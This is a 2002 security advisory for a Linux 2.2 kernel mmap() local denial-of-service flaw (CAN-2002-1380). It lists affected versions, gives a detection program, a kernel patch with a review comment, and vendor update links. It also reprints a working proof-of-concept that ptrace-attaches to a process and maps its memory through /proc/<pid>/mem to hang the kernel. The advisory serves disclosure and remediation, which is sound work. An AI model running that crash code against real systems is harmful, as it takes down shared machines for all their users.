
Linux Kernel 2.2 mmap() Local Denial-of-Service Vulnerability


Published: 2002-12-17
Updated: 2002-12-19
Severity:
Threat level: local denial of service
Error type: design error
Exploitation method: client mode

BUGTRAQ ID: 6420
CVE(CAN) ID: CAN-2002-1380

Affected systems
Linux kernel 2.2.1
Linux kernel 2.2.2
Linux kernel 2.2.3
Linux kernel 2.2.4
Linux kernel 2.2.5
Linux kernel 2.2.6
Linux kernel 2.2.7
Linux kernel 2.2.8
Linux kernel 2.2.9
Linux kernel 2.2.10
   +Caldera OpenLinux 2.3
Linux kernel 2.2.11
Linux kernel 2.2.12
Linux kernel 2.2.13
   +S.u.S.E. Linux 6.3
   +S.u.S.E. Linux 6.4
Linux kernel 2.2.14
   +RedHat Linux 6.2
   +SCO eDesktop 2.4
   +SCO eServer 2.3.1
Linux kernel 2.2.15
   +MandrakeSoft Corporate Server 1.0.1
   +MandrakeSoft Linux Mandrake 7.1
Linux kernel 2.2.16
   +RedHat Linux 7.0
   +Trustix Secure Linux 1.1
Linux kernel 2.2.17
   +MandrakeSoft Linux Mandrake 7.2
   +S.u.S.E. Linux 7.0
   +Trustix Secure Linux 1.2
Linux kernel 2.2.18
   +Wirex Immunix OS 6.2
   +Wirex Immunix OS 7.0
   +Wirex Immunix OS 7.0 -Beta
Linux kernel 2.2.19
   +EnGarde Secure Linux 1.0.1
   +MandrakeSoft Linux Mandrake 8.0
   +MandrakeSoft Linux Mandrake 8.0 ppc
   +MandrakeSoft Linux Mandrake 8.1
   +MandrakeSoft Single Network Firewall 7.2
   +S.u.S.E. Linux 6.3
   +S.u.S.E. Linux 6.4
   +S.u.S.E. Linux 7.0
   +Trustix Secure Linux 1.5
Linux kernel 2.2.20
Linux kernel 2.2.21
Linux kernel 2.2.22
   +Trustix Secure Linux 1.1
   +Trustix Secure Linux 1.2
   +Trustix Secure Linux 1.5
Linux kernel 2.2.23
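Description
The Linux 2.2 kernel contains a denial-of-service vulnerability: an unprivileged ordinary user may be able to make the kernel stop responding through a flaw in the mmap() implementation.

2.4 kernels are not affected, because the /proc/pid/mem implementation that supported mmap() has been removed.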
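
A check for the condition described above, as an added example (not code from the advisory or from the kernel source): it classifies the running kernel by its release string and, outside the 2.2 series, confirms that mmap() on /proc/self/mem is refused with ENODEV, the error returned for a file that has no mmap handler. The function names are this example's own.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <unistd.h>

/* 1 if the release string names a 2.2.x kernel, the series this advisory lists. */
int release_is_2_2(const char *release) {
    int major = 0, minor = 0;
    if (sscanf(release, "%d.%d", &major, &minor) != 2) return 0;
    return major == 2 && minor == 2;
}

/* Ask for a one-page mapping of /proc/self/mem and never touch it.
 * Returns 0 if the kernel accepted the mapping, the errno if it refused
 * (ENODEV: the file has no mmap handler), or -1 if the file cannot be opened. */
int proc_mem_mmap_errno(void) {
    static char anchor[1];              /* any address inside this process */
    unsigned long psz = (unsigned long)sysconf(_SC_PAGESIZE);
    int fd = open("/proc/self/mem", O_RDONLY);
    if (fd < 0) return -1;
    off_t off = (off_t)((unsigned long)(void *)anchor & ~(psz - 1));
    void *m = mmap(NULL, psz, PROT_READ, MAP_PRIVATE, fd, off);
    int err = (m == MAP_FAILED) ? errno : 0;
    if (m != MAP_FAILED) munmap(m, psz);
    close(fd);
    return err;
}

int main(void) {
    struct utsname u;
    if (uname(&u) != 0) return 2;
    if (release_is_2_2(u.release)) {
        /* Do not probe here: rely on the installed vendor package instead. */
        printf("%s: 2.2 series, listed as affected; confirm the vendor fix\n", u.release);
        return 1;
    }
    int e = proc_mem_mmap_errno();
    printf("%s: mmap of /proc/self/mem: %s\n", u.release,
           e == ENODEV ? "ENODEV (no mmap handler)" :
           e == 0 ? "accepted" : "other error");
    return e == 0;
}
```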

Test code
Michal Zalewski <mzalewsk@razor.bindview.com> provided the following test code:

#define PAGES 10

#include <asm/page.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ptrace.h>

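int main() {
  int ad1,ad2,zer,mem,pid,i;
  /* Parent: map PAGES pages of /dev/zero with no access rights (prot = 0). */
  zer=open("/dev/zero",O_RDONLY);
  ad1=(int)mmap(0,PAGES*PAGE_SIZE,0,MAP_PRIVATE,zer,0);
  pid=getpid();
  if (!fork()) {
    char p[64];
    /* Child: attach to the parent with ptrace, then open the parent's /proc/<pid>/mem. */
    ptrace(PTRACE_ATTACH,pid,0,0);
    sleep(1);
    sprintf(p,"/proc/%d/mem",pid);
    mem=open(p,O_RDONLY);
    /* Map the parent's region through /proc/<pid>/mem, using its address as the offset. */
    ad2=(int)mmap(0,PAGES*PAGE_SIZE,PROT_READ,MAP_PRIVATE,mem,ad1);
    /* Read from the new mapping. */
    write(1,(char*)ad2,PAGES*PAGE_SIZE);
  }
  sleep(100);
  return 0;
}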

Solution
Unofficial temporary patch:

--- linux-2.2/fs/proc/mem.c.old Sun Mar 25 08:30:58 2001
+++ linux-2.2/fs/proc/mem.c Tue Dec 10 14:29:05 2002
@@ -323,7 +323,7 @@
NULL, /* mem_readdir */
NULL, /* mem_poll */
NULL, /* mem_ioctl */
- mem_mmap, /* mmap */
+ NULL, /* mmap */
NULL, /* no special open code */
NULL, /* flush */
NULL, /* no special release code */
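
Review bot: The replaced slot at line 326 (`NULL, /* mmap */`) gives no indication that mmap was removed on purpose, and because this is the only hunk, the `mem_mmap` definition stays in fs/proc/mem.c with nothing referencing it. Suggest extending the slot comment to say that mmap of /proc/pid/mem is deliberately unsupported (CAN-2002-1380), and removing the `mem_mmap` function or wrapping it in `#if 0` in the same patch so it cannot be wired back in by accident and does not produce an unused-function warning.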

Trustix Secure Linux provides the following updates:

Trustix Secure Linux RPM kernel-utils-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-utils-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-source-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-source-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-smp-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-smp-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-headers-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-headers-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-doc-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-doc-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-BOOT-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-BOOT-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/kernel-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-utils-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-utils-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-source-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-source-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-smp-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-smp-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-headers-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-headers-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-doc-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-doc-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-BOOT-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-BOOT-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/kernel-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-utils-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-utils-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-source-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-source-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-smp-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-smp-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-headers-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-headers-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-doc-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-doc-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-BOOT-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-BOOT-2.2.22-8tr.i586.rpm

Trustix Secure Linux RPM kernel-2.2.22-8tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/kernel-2.2.22-8tr.i586.rpm

Related information
Discovered by: Michal Zalewski <mzalewsk@razor.bindview.com>

References: http://online.securityfocus.com/advisories/4797
            http://online.securityfocus.com/advisories/4807